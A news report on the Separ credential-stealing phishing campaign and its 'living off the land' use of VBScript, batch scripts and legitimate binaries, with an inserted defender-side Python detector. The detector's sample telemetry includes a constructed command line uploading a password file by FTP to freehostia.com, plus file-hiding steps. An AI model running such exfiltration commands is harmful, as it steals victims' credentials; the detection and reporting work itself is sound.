New Separ credential-stealing campaign abuses legit tools and executables

News by Bradley Barth

A new phishing campaign distributing the credential-stealing malware Separ has over the last few weeks reportedly affected hundreds of business organisations, primarily those located in Southeast Asia and the Middle East.


The malware has been uploading stolen data from infected entities on a daily basis, with additional targets based in North America, according to a 19 February corporate blog post authored by Guy Propper, a researcher with Deep Instinct.

Victims of the scam receive phishing emails with attachments disguised as PDF documents; each is actually a self-extracting archive containing a series of files that collectively work to launch the Separ payload. These include a VBScript, two batch scripts and four executable files, some with names that appear to imitate Adobe.

Typically, the emails allude to pricing quotes, shipments and equipment specs in order to trick business recipients into opening these attachments. If they do, the self-extracting archive runs the VBScript, which in turn calls the first batch script, which sets up directories and copies certain files to them before producing the second batch script.

Among other malicious actions, the second batch script launches legitimate email and browser password-dumping tools from SecurityXploded in order to steal user credentials for exfiltration. Separ then abuses the legitimate FTP client ancp.exe to upload the stolen files to freehostia.com, a legitimate hosting service.

The malware also abuses the legitimate executables xcopy.exe, attrib.exe and sleep.exe for its own nefarious purposes. "The [malicious] use of scripts and legitimate binaries, in a ‘Living off the Land’ scenario, means the attacker successfully evades detection, despite the simplicity of the attack," Propper explains.
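A defender-side check for the chain described above, added here as an illustration and not code from the article or from Deep Instinct: it scores process-creation events for the script-to-batch hop, the abused binaries running under the batch stage, and the ancp.exe upload to freehostia.com. Assumptions: the VBScript runs under wscript.exe and the batch scripts under cmd.exe; the scoring weights, host names and command lines (including ancp.exe's arguments) are constructed.

```python
from collections import namedtuple

# Binaries the article says Separ abuses (ancp.exe for FTP, plus xcopy/attrib/sleep).
ABUSED_BINARIES = {"ancp.exe", "xcopy.exe", "attrib.exe", "sleep.exe"}
EXFIL_DOMAIN = "freehostia.com"  # hosting service the article names as the upload target
# One process-creation event: image names only, as an EDR or Sysmon-style source would give.
ProcEvent = namedtuple("ProcEvent", "host parent image cmdline")

def score_host(events):
    """Return (score, reasons) for one host's events. Weights are assumed, not from the article."""
    score, reasons = 0, []
    edges = {(e.parent.lower(), e.image.lower()) for e in events}
    if ("wscript.exe", "cmd.exe") in edges:  # assumes the VBScript runs under wscript.exe
        score += 1
        reasons.append("script host spawned cmd.exe (VBScript -> batch stage)")
    abused = sorted({e.image.lower() for e in events
                     if e.image.lower() in ABUSED_BINARIES and e.parent.lower() == "cmd.exe"})
    if len(abused) >= 2:  # a single xcopy under cmd.exe is normal admin activity
        score += 1
        reasons.append("batch stage ran abused binaries: " + ", ".join(abused))
    if any(e.image.lower() == "ancp.exe" and EXFIL_DOMAIN in e.cmdline.lower() for e in events):
        score += 2
        reasons.append(f"ancp.exe FTP upload to {EXFIL_DOMAIN}")
    return score, reasons

def detect(events, threshold=3):
    """Group events by host; return {host: reasons} for hosts at or above the threshold."""
    by_host = {}
    for e in events:
        by_host.setdefault(e.host, []).append(e)
    hits = {}
    for host, evs in by_host.items():
        score, reasons = score_host(evs)
        if score >= threshold:
            hits[host] = reasons
    return hits

# Constructed sample telemetry (not real logs): one infected host, one benign admin host.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "explorer.exe", "wscript.exe", "wscript.exe quote.vbs"),
    ProcEvent("ws01", "wscript.exe", "cmd.exe", "cmd /c stage1.bat"),
    ProcEvent("ws01", "cmd.exe", "xcopy.exe", "xcopy /y adobe.exe C:\\Users\\Public\\"),
    ProcEvent("ws01", "cmd.exe", "attrib.exe", "attrib +h C:\\Users\\Public\\adobe.exe"),
    ProcEvent("ws01", "cmd.exe", "ancp.exe", "ancp.exe ftp.freehostia.com pw.txt"),  # args made up
    ProcEvent("adm02", "explorer.exe", "cmd.exe", "cmd"),
    ProcEvent("adm02", "cmd.exe", "xcopy.exe", "xcopy /s D:\\backup E:\\"),
]
```

Calling `detect(SAMPLE_EVENTS)` flags only `ws01`; the admin host's lone xcopy stays below the threshold.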

"We were able to access the FTP server several times, and the growth in the number of victims was clearly visible, meaning the attack is ongoing and successfully infecting many victims," Propper continues, noting that stolen data has included "ipconfig results in addition to email and browser passwords."

This article was originally published on SC Media US.
